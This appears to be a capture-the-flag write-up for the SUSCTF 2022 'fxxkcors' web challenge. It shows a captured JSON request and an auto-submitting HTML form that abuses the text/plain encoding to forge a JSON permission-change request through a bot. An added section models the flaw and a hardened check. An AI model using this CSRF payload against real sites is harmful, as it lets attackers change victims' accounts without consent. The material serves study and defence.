SUSCTF 2022 - web/fxxkcors #50

Open
aszx87410 opened this issue Mar 1, 2022 · 0 comments

You can log in with any username, and then there is a page to change permission: http://124.71.205.122:10002/change.php

The request looks like this; it's in JSON format:

```http
POST /changeapi.php HTTP/1.1
Host: 124.71.205.122:10002
Content-Length: 19
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://124.71.205.122:10002
Referer: http://124.71.205.122:10002/change.php
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=1ab6387f551b235d26d1c88a3685d752
Connection: close

{"username":"huli"}
```

There is also a bot that you can send any link to, so we can do CSRF here via `<form>` and `enctype="text/plain"`, like this:

```html
<body>
    <form id=a action="http://124.71.205.122:10002/changeapi.php" method="POST" enctype="text/plain">
      <input name='{"username":"fweewfwef", "abc":"' value='123"}'>
    </form>
    <script>
      a.submit()
    </script>
</body>
```

The form above will send a request with the body `{"username":"fweewfwef", "abc":"=123"}` and content type `text/plain`. The server did not check the content type, so it's fine.

After updating the permission, just visit home.php and get the flag.
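The missing server-side check, as an added example that is not part of the original write-up or the challenge's code: a constructed JavaScript model (the real endpoint is PHP) showing why the `text/plain` form body parses as JSON and how requiring `application/json` rejects it. The names `encodeTextPlain`, `mediaType`, `lenientHandler` and `strictHandler` and the request objects are assumptions made for the illustration.

```javascript
// Added example: a constructed model of the endpoint, not the challenge's PHP code.

// HTML "text/plain" form encoding: every field is emitted as name=value + CRLF,
// and neither the name nor the value is escaped.
function encodeTextPlain(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join("");
}

// Media type without parameters: "application/json; charset=UTF-8" -> "application/json".
function mediaType(header) {
  return String(header || "").split(";")[0].trim().toLowerCase();
}

// Behaviour the write-up describes: the body is parsed as JSON whatever its Content-Type.
function lenientHandler(req) {
  return { status: 200, username: JSON.parse(req.body).username };
}

// Hardened variant: only application/json is accepted. An HTML form cannot send that
// type, and a cross-origin fetch/XHR that sets it must pass a CORS preflight first.
function strictHandler(req) {
  if (mediaType(req.headers["content-type"]) !== "application/json") {
    return { status: 415, error: "unsupported media type" };
  }
  let data;
  try {
    data = JSON.parse(req.body);
  } catch (err) {
    return { status: 400, error: "invalid JSON" };
  }
  if (data === null || typeof data !== "object" || typeof data.username !== "string") {
    return { status: 400, error: "username must be a string" };
  }
  return { status: 200, username: data.username };
}

// Constructed sample requests, modelled on the two requests shown in the write-up.
const formRequest = {
  headers: { "content-type": "text/plain" },
  body: encodeTextPlain([['{"username":"fweewfwef", "abc":"', '123"}']]),
};
const jsonRequest = {
  headers: { "content-type": "application/json; charset=UTF-8" },
  body: '{"username":"huli"}',
};

console.log(lenientHandler(formRequest), strictHandler(formRequest), strictHandler(jsonRequest));
```

The trailing CRLF that the form encoding appends is JSON whitespace, which is why the lenient parser accepts the body unchanged.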
